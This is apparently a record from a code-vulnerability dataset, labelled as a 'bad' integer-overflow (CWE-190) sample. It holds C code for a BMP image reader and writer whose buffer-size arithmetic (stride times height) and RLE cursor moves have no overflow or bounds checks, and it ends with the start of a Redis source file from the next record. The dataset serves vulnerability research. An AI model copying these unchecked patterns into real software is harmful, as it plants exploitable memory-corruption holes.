static void bmpmask16toimage(const OPJ_UINT8* pData, OPJ_UINT32 stride, opj_image_t* image, OPJ_UINT32 redMask, OPJ_UINT32 greenMask, OPJ_UINT32 blueMask, OPJ_UINT32 alphaMask)
{
int index;
OPJ_UINT32 width, height;
OPJ_UINT32 x, y;
const OPJ_UINT8 *pSrc = NULL;
OPJ_BOOL hasAlpha;
OPJ_UINT32 redShift, redPrec;
OPJ_UINT32 greenShift, greenPrec;
OPJ_UINT32 blueShift, bluePrec;
OPJ_UINT32 alphaShift, alphaPrec;
width = image->comps[0].w;
height = image->comps[0].h;
hasAlpha = image->numcomps > 3U;
bmp_mask_get_shift_and_prec(redMask, &redShift, &redPrec);
bmp_mask_get_shift_and_prec(greenMask, &greenShift, &greenPrec);
bmp_mask_get_shift_and_prec(blueMask, &blueShift, &bluePrec);
bmp_mask_get_shift_and_prec(alphaMask, &alphaShift, &alphaPrec);
image->comps[0].bpp = redPrec;
image->comps[0].prec = redPrec;
image->comps[1].bpp = greenPrec;
image->comps[1].prec = greenPrec;
image->comps[2].bpp = bluePrec;
image->comps[2].prec = bluePrec;
if (hasAlpha) {
image->comps[3].bpp = alphaPrec;
image->comps[3].prec = alphaPrec;
}
index = 0;
pSrc = pData + (height - 1U) * stride;
for(y = 0; y < height; y++)
{
for(x = 0; x < width; x++)
{
OPJ_UINT32 value = 0U;
value |= ((OPJ_UINT32)pSrc[2*x+0]) << 0;
value |= ((OPJ_UINT32)pSrc[2*x+1]) << 8;
image->comps[0].data[index] = (OPJ_INT32)((value & redMask) >> redShift); /* R */
image->comps[1].data[index] = (OPJ_INT32)((value & greenMask) >> greenShift); /* G */
image->comps[2].data[index] = (OPJ_INT32)((value & blueMask) >> blueShift); /* B */
if (hasAlpha) {
image->comps[3].data[index] = (OPJ_INT32)((value & alphaMask) >> alphaShift); /* A */
}
index++;
}
pSrc -= stride;
}
}
static opj_image_t* bmp8toimage(const OPJ_UINT8* pData, OPJ_UINT32 stride, opj_image_t* image, OPJ_UINT8 const* const* pLUT)
{
OPJ_UINT32 width, height;
const OPJ_UINT8 *pSrc = NULL;
width = image->comps[0].w;
height = image->comps[0].h;
pSrc = pData + (height - 1U) * stride;
if (image->numcomps == 1U) {
opj_applyLUT8u_8u32s_C1R(pSrc, -(OPJ_INT32)stride, image->comps[0].data, (OPJ_INT32)width, pLUT[0], width, height);
}
else {
OPJ_INT32* pDst[3];
OPJ_INT32 pDstStride[3];
pDst[0] = image->comps[0].data; pDst[1] = image->comps[1].data; pDst[2] = image->comps[2].data;
pDstStride[0] = (OPJ_INT32)width; pDstStride[1] = (OPJ_INT32)width; pDstStride[2] = (OPJ_INT32)width;
opj_applyLUT8u_8u32s_C1P3R(pSrc, -(OPJ_INT32)stride, pDst, pDstStride, pLUT, width, height);
}
return image;
}
static OPJ_BOOL bmp_read_file_header(FILE* IN, OPJ_BITMAPFILEHEADER* header)
{
header->bfType = (OPJ_UINT16)getc(IN);
header->bfType |= (OPJ_UINT16)((OPJ_UINT32)getc(IN) << 8);
if (header->bfType != 19778) {
fprintf(stderr,"Error, not a BMP file!\n");
return OPJ_FALSE;
}
/* FILE HEADER */
/* ------------- */
header->bfSize = (OPJ_UINT32)getc(IN);
header->bfSize |= (OPJ_UINT32)getc(IN) << 8;
header->bfSize |= (OPJ_UINT32)getc(IN) << 16;
header->bfSize |= (OPJ_UINT32)getc(IN) << 24;
header->bfReserved1 = (OPJ_UINT16)getc(IN);
header->bfReserved1 |= (OPJ_UINT16)((OPJ_UINT32)getc(IN) << 8);
header->bfReserved2 = (OPJ_UINT16)getc(IN);
header->bfReserved2 |= (OPJ_UINT16)((OPJ_UINT32)getc(IN) << 8);
header->bfOffBits = (OPJ_UINT32)getc(IN);
header->bfOffBits |= (OPJ_UINT32)getc(IN) << 8;
header->bfOffBits |= (OPJ_UINT32)getc(IN) << 16;
header->bfOffBits |= (OPJ_UINT32)getc(IN) << 24;
return OPJ_TRUE;
}
static OPJ_BOOL bmp_read_info_header(FILE* IN, OPJ_BITMAPINFOHEADER* header)
{
memset(header, 0, sizeof(*header));
/* INFO HEADER */
/* ------------- */
header->biSize = (OPJ_UINT32)getc(IN);
header->biSize |= (OPJ_UINT32)getc(IN) << 8;
header->biSize |= (OPJ_UINT32)getc(IN) << 16;
header->biSize |= (OPJ_UINT32)getc(IN) << 24;
switch (header->biSize) {
case 12U: /* BITMAPCOREHEADER */
case 40U: /* BITMAPINFOHEADER */
case 52U: /* BITMAPV2INFOHEADER */
case 56U: /* BITMAPV3INFOHEADER */
case 108U: /* BITMAPV4HEADER */
case 124U: /* BITMAPV5HEADER */
break;
default:
fprintf(stderr,"Error, unknown BMP header size %d\n", header->biSize);
return OPJ_FALSE;
}
header->biWidth = (OPJ_UINT32)getc(IN);
header->biWidth |= (OPJ_UINT32)getc(IN) << 8;
header->biWidth |= (OPJ_UINT32)getc(IN) << 16;
header->biWidth |= (OPJ_UINT32)getc(IN) << 24;
header->biHeight = (OPJ_UINT32)getc(IN);
header->biHeight |= (OPJ_UINT32)getc(IN) << 8;
header->biHeight |= (OPJ_UINT32)getc(IN) << 16;
header->biHeight |= (OPJ_UINT32)getc(IN) << 24;
header->biPlanes = (OPJ_UINT16)getc(IN);
header->biPlanes |= (OPJ_UINT16)((OPJ_UINT32)getc(IN) << 8);
header->biBitCount = (OPJ_UINT16)getc(IN);
header->biBitCount |= (OPJ_UINT16)((OPJ_UINT32)getc(IN) << 8);
if(header->biSize >= 40U) {
header->biCompression = (OPJ_UINT32)getc(IN);
header->biCompression |= (OPJ_UINT32)getc(IN) << 8;
header->biCompression |= (OPJ_UINT32)getc(IN) << 16;
header->biCompression |= (OPJ_UINT32)getc(IN) << 24;
header->biSizeImage = (OPJ_UINT32)getc(IN);
header->biSizeImage |= (OPJ_UINT32)getc(IN) << 8;
header->biSizeImage |= (OPJ_UINT32)getc(IN) << 16;
header->biSizeImage |= (OPJ_UINT32)getc(IN) << 24;
header->biXpelsPerMeter = (OPJ_UINT32)getc(IN);
header->biXpelsPerMeter |= (OPJ_UINT32)getc(IN) << 8;
header->biXpelsPerMeter |= (OPJ_UINT32)getc(IN) << 16;
header->biXpelsPerMeter |= (OPJ_UINT32)getc(IN) << 24;
header->biYpelsPerMeter = (OPJ_UINT32)getc(IN);
header->biYpelsPerMeter |= (OPJ_UINT32)getc(IN) << 8;
header->biYpelsPerMeter |= (OPJ_UINT32)getc(IN) << 16;
header->biYpelsPerMeter |= (OPJ_UINT32)getc(IN) << 24;
header->biClrUsed = (OPJ_UINT32)getc(IN);
header->biClrUsed |= (OPJ_UINT32)getc(IN) << 8;
header->biClrUsed |= (OPJ_UINT32)getc(IN) << 16;
header->biClrUsed |= (OPJ_UINT32)getc(IN) << 24;
header->biClrImportant = (OPJ_UINT32)getc(IN);
header->biClrImportant |= (OPJ_UINT32)getc(IN) << 8;
header->biClrImportant |= (OPJ_UINT32)getc(IN) << 16;
header->biClrImportant |= (OPJ_UINT32)getc(IN) << 24;
}
if(header->biSize >= 56U) {
header->biRedMask = (OPJ_UINT32)getc(IN);
header->biRedMask |= (OPJ_UINT32)getc(IN) << 8;
header->biRedMask |= (OPJ_UINT32)getc(IN) << 16;
header->biRedMask |= (OPJ_UINT32)getc(IN) << 24;
header->biGreenMask = (OPJ_UINT32)getc(IN);
header->biGreenMask |= (OPJ_UINT32)getc(IN) << 8;
header->biGreenMask |= (OPJ_UINT32)getc(IN) << 16;
header->biGreenMask |= (OPJ_UINT32)getc(IN) << 24;
header->biBlueMask = (OPJ_UINT32)getc(IN);
header->biBlueMask |= (OPJ_UINT32)getc(IN) << 8;
header->biBlueMask |= (OPJ_UINT32)getc(IN) << 16;
header->biBlueMask |= (OPJ_UINT32)getc(IN) << 24;
header->biAlphaMask = (OPJ_UINT32)getc(IN);
header->biAlphaMask |= (OPJ_UINT32)getc(IN) << 8;
header->biAlphaMask |= (OPJ_UINT32)getc(IN) << 16;
header->biAlphaMask |= (OPJ_UINT32)getc(IN) << 24;
}
if(header->biSize >= 108U) {
header->biColorSpaceType = (OPJ_UINT32)getc(IN);
header->biColorSpaceType |= (OPJ_UINT32)getc(IN) << 8;
header->biColorSpaceType |= (OPJ_UINT32)getc(IN) << 16;
header->biColorSpaceType |= (OPJ_UINT32)getc(IN) << 24;
if (fread(&(header->biColorSpaceEP), 1U, sizeof(header->biColorSpaceEP), IN) != sizeof(header->biColorSpaceEP)) {
fprintf(stderr,"Error, can't read BMP header\n");
return OPJ_FALSE;
}
header->biRedGamma = (OPJ_UINT32)getc(IN);
header->biRedGamma |= (OPJ_UINT32)getc(IN) << 8;
header->biRedGamma |= (OPJ_UINT32)getc(IN) << 16;
header->biRedGamma |= (OPJ_UINT32)getc(IN) << 24;
header->biGreenGamma = (OPJ_UINT32)getc(IN);
header->biGreenGamma |= (OPJ_UINT32)getc(IN) << 8;
header->biGreenGamma |= (OPJ_UINT32)getc(IN) << 16;
header->biGreenGamma |= (OPJ_UINT32)getc(IN) << 24;
header->biBlueGamma = (OPJ_UINT32)getc(IN);
header->biBlueGamma |= (OPJ_UINT32)getc(IN) << 8;
header->biBlueGamma |= (OPJ_UINT32)getc(IN) << 16;
header->biBlueGamma |= (OPJ_UINT32)getc(IN) << 24;
}
if(header->biSize >= 124U) {
header->biIntent = (OPJ_UINT32)getc(IN);
header->biIntent |= (OPJ_UINT32)getc(IN) << 8;
header->biIntent |= (OPJ_UINT32)getc(IN) << 16;
header->biIntent |= (OPJ_UINT32)getc(IN) << 24;
header->biIccProfileData = (OPJ_UINT32)getc(IN);
header->biIccProfileData |= (OPJ_UINT32)getc(IN) << 8;
header->biIccProfileData |= (OPJ_UINT32)getc(IN) << 16;
header->biIccProfileData |= (OPJ_UINT32)getc(IN) << 24;
header->biIccProfileSize = (OPJ_UINT32)getc(IN);
header->biIccProfileSize |= (OPJ_UINT32)getc(IN) << 8;
header->biIccProfileSize |= (OPJ_UINT32)getc(IN) << 16;
header->biIccProfileSize |= (OPJ_UINT32)getc(IN) << 24;
header->biReserved = (OPJ_UINT32)getc(IN);
header->biReserved |= (OPJ_UINT32)getc(IN) << 8;
header->biReserved |= (OPJ_UINT32)getc(IN) << 16;
header->biReserved |= (OPJ_UINT32)getc(IN) << 24;
}
return OPJ_TRUE;
}
static OPJ_BOOL bmp_read_raw_data(FILE* IN, OPJ_UINT8* pData, OPJ_UINT32 stride, OPJ_UINT32 width, OPJ_UINT32 height)
{
OPJ_ARG_NOT_USED(width);
if ( fread(pData, sizeof(OPJ_UINT8), stride * height, IN) != (stride * height) )
{
fprintf(stderr, "\nError: fread return a number of element different from the expected.\n");
return OPJ_FALSE;
}
return OPJ_TRUE;
}
static OPJ_BOOL bmp_read_rle8_data(FILE* IN, OPJ_UINT8* pData, OPJ_UINT32 stride, OPJ_UINT32 width, OPJ_UINT32 height)
{
OPJ_UINT32 x, y;
OPJ_UINT8 *pix;
const OPJ_UINT8 *beyond;
beyond = pData + stride * height;
pix = pData;
x = y = 0U;
while (y < height)
{
int c = getc(IN);
if (c) {
int j;
OPJ_UINT8 c1 = (OPJ_UINT8)getc(IN);
for (j = 0; (j < c) && (x < width) && ((OPJ_SIZE_T)pix < (OPJ_SIZE_T)beyond); j++, x++, pix++) {
*pix = c1;
}
}
else {
c = getc(IN);
if (c == 0x00) { /* EOL */
x = 0;
++y;
pix = pData + y * stride + x;
}
else if (c == 0x01) { /* EOP */
break;
}
else if (c == 0x02) { /* MOVE by dxdy */
c = getc(IN);
x += (OPJ_UINT32)c;
c = getc(IN);
y += (OPJ_UINT32)c;
pix = pData + y * stride + x;
}
else /* 03 .. 255 */
{
int j;
for (j = 0; (j < c) && (x < width) && ((OPJ_SIZE_T)pix < (OPJ_SIZE_T)beyond); j++, x++, pix++)
{
OPJ_UINT8 c1 = (OPJ_UINT8)getc(IN);
*pix = c1;
}
if ((OPJ_UINT32)c & 1U) { /* skip padding byte */
getc(IN);
}
}
}
}/* while() */
return OPJ_TRUE;
}
static OPJ_BOOL bmp_read_rle4_data(FILE* IN, OPJ_UINT8* pData, OPJ_UINT32 stride, OPJ_UINT32 width, OPJ_UINT32 height)
{
OPJ_UINT32 x, y;
OPJ_UINT8 *pix;
const OPJ_UINT8 *beyond;
beyond = pData + stride * height;
pix = pData;
x = y = 0U;
while(y < height)
{
int c = getc(IN);
if(c == EOF) break;
if(c) {/* encoded mode */
int j;
OPJ_UINT8 c1 = (OPJ_UINT8)getc(IN);
for (j = 0; (j < c) && (x < width) && ((OPJ_SIZE_T)pix < (OPJ_SIZE_T)beyond); j++, x++, pix++) {
*pix = (OPJ_UINT8)((j&1) ? (c1 & 0x0fU) : ((c1>>4)&0x0fU));
}
}
else { /* absolute mode */
c = getc(IN);
if(c == EOF) break;
if(c == 0x00) { /* EOL */
x = 0; y++; pix = pData + y * stride;
}
else if(c == 0x01) { /* EOP */
break;
}
else if(c == 0x02) { /* MOVE by dxdy */
c = getc(IN); x += (OPJ_UINT32)c;
c = getc(IN); y += (OPJ_UINT32)c;
pix = pData + y * stride + x;
}
else { /* 03 .. 255 : absolute mode */
int j;
OPJ_UINT8 c1 = 0U;
for (j = 0; (j < c) && (x < width) && ((OPJ_SIZE_T)pix < (OPJ_SIZE_T)beyond); j++, x++, pix++) {
if((j&1) == 0) {
c1 = (OPJ_UINT8)getc(IN);
}
*pix = (OPJ_UINT8)((j&1) ? (c1 & 0x0fU) : ((c1>>4)&0x0fU));
}
if(((c&3) == 1) || ((c&3) == 2)) { /* skip padding byte */
getc(IN);
}
}
}
} /* while(y < height) */
return OPJ_TRUE;
}
opj_image_t* bmptoimage(const char *filename, opj_cparameters_t *parameters)
{
opj_image_cmptparm_t cmptparm[4]; /* maximum of 4 components */
OPJ_UINT8 lut_R[256], lut_G[256], lut_B[256];
OPJ_UINT8 const* pLUT[3];
opj_image_t * image = NULL;
FILE *IN;
OPJ_BITMAPFILEHEADER File_h;
OPJ_BITMAPINFOHEADER Info_h;
OPJ_UINT32 i, palette_len, numcmpts = 1U;
OPJ_BOOL l_result = OPJ_FALSE;
OPJ_UINT8* pData = NULL;
OPJ_UINT32 stride;
pLUT[0] = lut_R; pLUT[1] = lut_G; pLUT[2] = lut_B;
IN = fopen(filename, "rb");
if (!IN)
{
fprintf(stderr, "Failed to open %s for reading !!\n", filename);
return NULL;
}
if (!bmp_read_file_header(IN, &File_h)) {
fclose(IN);
return NULL;
}
if (!bmp_read_info_header(IN, &Info_h)) {
fclose(IN);
return NULL;
}
/* Load palette */
if (Info_h.biBitCount <= 8U)
{
memset(&lut_R[0], 0, sizeof(lut_R));
memset(&lut_G[0], 0, sizeof(lut_G));
memset(&lut_B[0], 0, sizeof(lut_B));
palette_len = Info_h.biClrUsed;
if((palette_len == 0U) && (Info_h.biBitCount <= 8U)) {
palette_len = (1U << Info_h.biBitCount);
}
if (palette_len > 256U) {
palette_len = 256U;
}
if (palette_len > 0U) {
OPJ_UINT8 has_color = 0U;
for (i = 0U; i < palette_len; i++) {
lut_B[i] = (OPJ_UINT8)getc(IN);
lut_G[i] = (OPJ_UINT8)getc(IN);
lut_R[i] = (OPJ_UINT8)getc(IN);
(void)getc(IN); /* padding */
has_color |= (lut_B[i] ^ lut_G[i]) | (lut_G[i] ^ lut_R[i]);
}
if(has_color) {
numcmpts = 3U;
}
}
} else {
numcmpts = 3U;
if ((Info_h.biCompression == 3) && (Info_h.biAlphaMask != 0U)) {
numcmpts++;
}
}
stride = ((Info_h.biWidth * Info_h.biBitCount + 31U) / 32U) * 4U; /* rows are aligned on 32bits */
if (Info_h.biBitCount == 4 && Info_h.biCompression == 2) { /* RLE 4 gets decoded as 8 bits data for now... */
stride = ((Info_h.biWidth * 8U + 31U) / 32U) * 4U;
}
pData = (OPJ_UINT8 *) calloc(1, stride * Info_h.biHeight * sizeof(OPJ_UINT8));
if (pData == NULL) {
fclose(IN);
return NULL;
}
/* Place the cursor at the beginning of the image information */
fseek(IN, 0, SEEK_SET);
fseek(IN, (long)File_h.bfOffBits, SEEK_SET);
switch (Info_h.biCompression) {
case 0:
case 3:
/* read raw data */
l_result = bmp_read_raw_data(IN, pData, stride, Info_h.biWidth, Info_h.biHeight);
break;
case 1:
/* read rle8 data */
l_result = bmp_read_rle8_data(IN, pData, stride, Info_h.biWidth, Info_h.biHeight);
break;
case 2:
/* read rle4 data */
l_result = bmp_read_rle4_data(IN, pData, stride, Info_h.biWidth, Info_h.biHeight);
break;
default:
fprintf(stderr, "Unsupported BMP compression\n");
l_result = OPJ_FALSE;
break;
}
if (!l_result) {
free(pData);
fclose(IN);
return NULL;
}
/* create the image */
memset(&cmptparm[0], 0, sizeof(cmptparm));
for(i = 0; i < 4U; i++)
{
cmptparm[i].prec = 8;
cmptparm[i].bpp = 8;
cmptparm[i].sgnd = 0;
cmptparm[i].dx = (OPJ_UINT32)parameters->subsampling_dx;
cmptparm[i].dy = (OPJ_UINT32)parameters->subsampling_dy;
cmptparm[i].w = Info_h.biWidth;
cmptparm[i].h = Info_h.biHeight;
}
image = opj_image_create(numcmpts, &cmptparm[0], (numcmpts == 1U) ? OPJ_CLRSPC_GRAY : OPJ_CLRSPC_SRGB);
if(!image) {
fclose(IN);
free(pData);
return NULL;
}
if (numcmpts == 4U) {
image->comps[3].alpha = 1;
}
/* set image offset and reference grid */
image->x0 = (OPJ_UINT32)parameters->image_offset_x0;
image->y0 = (OPJ_UINT32)parameters->image_offset_y0;
image->x1 = image->x0 + (Info_h.biWidth - 1U) * (OPJ_UINT32)parameters->subsampling_dx + 1U;
image->y1 = image->y0 + (Info_h.biHeight - 1U) * (OPJ_UINT32)parameters->subsampling_dy + 1U;
/* Read the data */
if (Info_h.biBitCount == 24 && Info_h.biCompression == 0) { /*RGB */
bmp24toimage(pData, stride, image);
}
else if (Info_h.biBitCount == 8 && Info_h.biCompression == 0) { /* RGB 8bpp Indexed */
bmp8toimage(pData, stride, image, pLUT);
}
else if (Info_h.biBitCount == 8 && Info_h.biCompression == 1) { /*RLE8*/
bmp8toimage(pData, stride, image, pLUT);
}
else if (Info_h.biBitCount == 4 && Info_h.biCompression == 2) { /*RLE4*/
bmp8toimage(pData, stride, image, pLUT); /* RLE 4 gets decoded as 8 bits data for now */
}
else if (Info_h.biBitCount == 32 && Info_h.biCompression == 0) { /* RGBX */
bmpmask32toimage(pData, stride, image, 0x00FF0000U, 0x0000FF00U, 0x000000FFU, 0x00000000U);
}
else if (Info_h.biBitCount == 32 && Info_h.biCompression == 3) { /* bitmask */
bmpmask32toimage(pData, stride, image, Info_h.biRedMask, Info_h.biGreenMask, Info_h.biBlueMask, Info_h.biAlphaMask);
}
else if (Info_h.biBitCount == 16 && Info_h.biCompression == 0) { /* RGBX */
bmpmask16toimage(pData, stride, image, 0x7C00U, 0x03E0U, 0x001FU, 0x0000U);
}
else if (Info_h.biBitCount == 16 && Info_h.biCompression == 3) { /* bitmask */
if ((Info_h.biRedMask == 0U) && (Info_h.biGreenMask == 0U) && (Info_h.biBlueMask == 0U)) {
Info_h.biRedMask = 0xF800U;
Info_h.biGreenMask = 0x07E0U;
Info_h.biBlueMask = 0x001FU;
}
bmpmask16toimage(pData, stride, image, Info_h.biRedMask, Info_h.biGreenMask, Info_h.biBlueMask, Info_h.biAlphaMask);
}
else {
opj_image_destroy(image);
image = NULL;
fprintf(stderr, "Other system than 24 bits/pixels or 8 bits (no RLE coding) is not yet implemented [%d]\n", Info_h.biBitCount);
}
free(pData);
fclose(IN);
return image;
}
int imagetobmp(opj_image_t * image, const char *outfile) {
int w, h;
int i, pad;
FILE *fdest = NULL;
int adjustR, adjustG, adjustB;
if (image->comps[0].prec < 8) {
fprintf(stderr, "Unsupported number of components: %d\n", image->comps[0].prec);
return 1;
}
if (image->numcomps >= 3 && image->comps[0].dx == image->comps[1].dx
&& image->comps[1].dx == image->comps[2].dx
&& image->comps[0].dy == image->comps[1].dy
&& image->comps[1].dy == image->comps[2].dy
&& image->comps[0].prec == image->comps[1].prec
&& image->comps[1].prec == image->comps[2].prec) {
/* -->> -->> -->> -->>
24 bits color
<<-- <<-- <<-- <<-- */
fdest = fopen(outfile, "wb");
if (!fdest) {
fprintf(stderr, "ERROR -> failed to open %s for writing\n", outfile);
return 1;
}
w = (int)image->comps[0].w;
h = (int)image->comps[0].h;
fprintf(fdest, "BM");
/* FILE HEADER */
/* ------------- */
fprintf(fdest, "%c%c%c%c",
(OPJ_UINT8) (h * w * 3 + 3 * h * (w % 2) + 54) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2) + 54) >> 8) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2) + 54) >> 16) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2) + 54) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (54) & 0xff, ((54) >> 8) & 0xff,((54) >> 16) & 0xff, ((54) >> 24) & 0xff);
/* INFO HEADER */
/* ------------- */
fprintf(fdest, "%c%c%c%c", (40) & 0xff, ((40) >> 8) & 0xff, ((40) >> 16) & 0xff, ((40) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) ((w) & 0xff),
(OPJ_UINT8) ((w) >> 8) & 0xff,
(OPJ_UINT8) ((w) >> 16) & 0xff,
(OPJ_UINT8) ((w) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) ((h) & 0xff),
(OPJ_UINT8) ((h) >> 8) & 0xff,
(OPJ_UINT8) ((h) >> 16) & 0xff,
(OPJ_UINT8) ((h) >> 24) & 0xff);
fprintf(fdest, "%c%c", (1) & 0xff, ((1) >> 8) & 0xff);
fprintf(fdest, "%c%c", (24) & 0xff, ((24) >> 8) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) (3 * h * w + 3 * h * (w % 2)) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2)) >> 8) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2)) >> 16) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2)) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (7834) & 0xff, ((7834) >> 8) & 0xff, ((7834) >> 16) & 0xff, ((7834) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (7834) & 0xff, ((7834) >> 8) & 0xff, ((7834) >> 16) & 0xff, ((7834) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
if (image->comps[0].prec > 8) {
adjustR = (int)image->comps[0].prec - 8;
printf("BMP CONVERSION: Truncating component 0 from %d bits to 8 bits\n", image->comps[0].prec);
}
else
adjustR = 0;
if (image->comps[1].prec > 8) {
adjustG = (int)image->comps[1].prec - 8;
printf("BMP CONVERSION: Truncating component 1 from %d bits to 8 bits\n", image->comps[1].prec);
}
else
adjustG = 0;
if (image->comps[2].prec > 8) {
adjustB = (int)image->comps[2].prec - 8;
printf("BMP CONVERSION: Truncating component 2 from %d bits to 8 bits\n", image->comps[2].prec);
}
else
adjustB = 0;
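/* BMP scanlines are written bottom-up in BGR order, each padded to a 4-byte boundary. */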
for (i = 0; i < w * h; i++) {
OPJ_UINT8 rc, gc, bc;
int r, g, b;
r = image->comps[0].data[w * h - ((i) / (w) + 1) * w + (i) % (w)];
r += (image->comps[0].sgnd ? 1 << (image->comps[0].prec - 1) : 0);
r = ((r >> adjustR)+((r >> (adjustR-1))%2));
if(r > 255) r = 255; else if(r < 0) r = 0;
rc = (OPJ_UINT8)r;
g = image->comps[1].data[w * h - ((i) / (w) + 1) * w + (i) % (w)];
g += (image->comps[1].sgnd ? 1 << (image->comps[1].prec - 1) : 0);
g = ((g >> adjustG)+((g >> (adjustG-1))%2));
if(g > 255) g = 255; else if(g < 0) g = 0;
gc = (OPJ_UINT8)g;
b = image->comps[2].data[w * h - ((i) / (w) + 1) * w + (i) % (w)];
b += (image->comps[2].sgnd ? 1 << (image->comps[2].prec - 1) : 0);
b = ((b >> adjustB)+((b >> (adjustB-1))%2));
if(b > 255) b = 255; else if(b < 0) b = 0;
bc = (OPJ_UINT8)b;
fprintf(fdest, "%c%c%c", bc, gc, rc);
if ((i + 1) % w == 0) {
for (pad = ((3 * w) % 4) ? (4 - (3 * w) % 4) : 0; pad > 0; pad--) /* ADD */
fprintf(fdest, "%c", 0);
}
}
fclose(fdest);
} else { /* Gray-scale */
/* -->> -->> -->> -->>
8 bits non code (Gray scale)
<<-- <<-- <<-- <<-- */
fdest = fopen(outfile, "wb");
if (!fdest) {
fprintf(stderr, "ERROR -> failed to open %s for writing\n", outfile);
return 1;
}
w = (int)image->comps[0].w;
h = (int)image->comps[0].h;
fprintf(fdest, "BM");
/* FILE HEADER */
/* ------------- */
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) (h * w + 54 + 1024 + h * (w % 2)) & 0xff,
(OPJ_UINT8) ((h * w + 54 + 1024 + h * (w % 2)) >> 8) & 0xff,
(OPJ_UINT8) ((h * w + 54 + 1024 + h * (w % 2)) >> 16) & 0xff,
(OPJ_UINT8) ((h * w + 54 + 1024 + h * (w % 2)) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (54 + 1024) & 0xff, ((54 + 1024) >> 8) & 0xff,
((54 + 1024) >> 16) & 0xff,
((54 + 1024) >> 24) & 0xff);
/* INFO HEADER */
/* ------------- */
fprintf(fdest, "%c%c%c%c", (40) & 0xff, ((40) >> 8) & 0xff, ((40) >> 16) & 0xff, ((40) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) ((w) & 0xff),
(OPJ_UINT8) ((w) >> 8) & 0xff,
(OPJ_UINT8) ((w) >> 16) & 0xff,
(OPJ_UINT8) ((w) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) ((h) & 0xff),
(OPJ_UINT8) ((h) >> 8) & 0xff,
(OPJ_UINT8) ((h) >> 16) & 0xff,
(OPJ_UINT8) ((h) >> 24) & 0xff);
fprintf(fdest, "%c%c", (1) & 0xff, ((1) >> 8) & 0xff);
fprintf(fdest, "%c%c", (8) & 0xff, ((8) >> 8) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) (h * w + h * (w % 2)) & 0xff,
(OPJ_UINT8) ((h * w + h * (w % 2)) >> 8) & 0xff,
(OPJ_UINT8) ((h * w + h * (w % 2)) >> 16) & 0xff,
(OPJ_UINT8) ((h * w + h * (w % 2)) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (7834) & 0xff, ((7834) >> 8) & 0xff, ((7834) >> 16) & 0xff, ((7834) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (7834) & 0xff, ((7834) >> 8) & 0xff, ((7834) >> 16) & 0xff, ((7834) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (256) & 0xff, ((256) >> 8) & 0xff, ((256) >> 16) & 0xff, ((256) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (256) & 0xff, ((256) >> 8) & 0xff, ((256) >> 16) & 0xff, ((256) >> 24) & 0xff);
if (image->comps[0].prec > 8) {
adjustR = (int)image->comps[0].prec - 8;
printf("BMP CONVERSION: Truncating component 0 from %d bits to 8 bits\n", image->comps[0].prec);
}else
adjustR = 0;
for (i = 0; i < 256; i++) {
fprintf(fdest, "%c%c%c%c", i, i, i, 0);
}
for (i = 0; i < w * h; i++) {
int r;
r = image->comps[0].data[w * h - ((i) / (w) + 1) * w + (i) % (w)];
r += (image->comps[0].sgnd ? 1 << (image->comps[0].prec - 1) : 0);
r = ((r >> adjustR)+((r >> (adjustR-1))%2));
if(r > 255) r = 255; else if(r < 0) r = 0;
fprintf(fdest, "%c", (OPJ_UINT8)r);
if ((i + 1) % w == 0) {
for (pad = (w % 4) ? (4 - w % 4) : 0; pad > 0; pad--) /* ADD */
fprintf(fdest, "%c", 0);
}
}
fclose(fdest);
}
return 0;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_4867_0 |
crossvul-cpp_data_bad_1943_0 | /* Configuration file parsing and CONFIG GET/SET commands implementation.
*
* Copyright (c) 2009-2012, Salvatore Sanfilippo <antirez at gmail dot com>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of Redis nor the names of its contributors may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
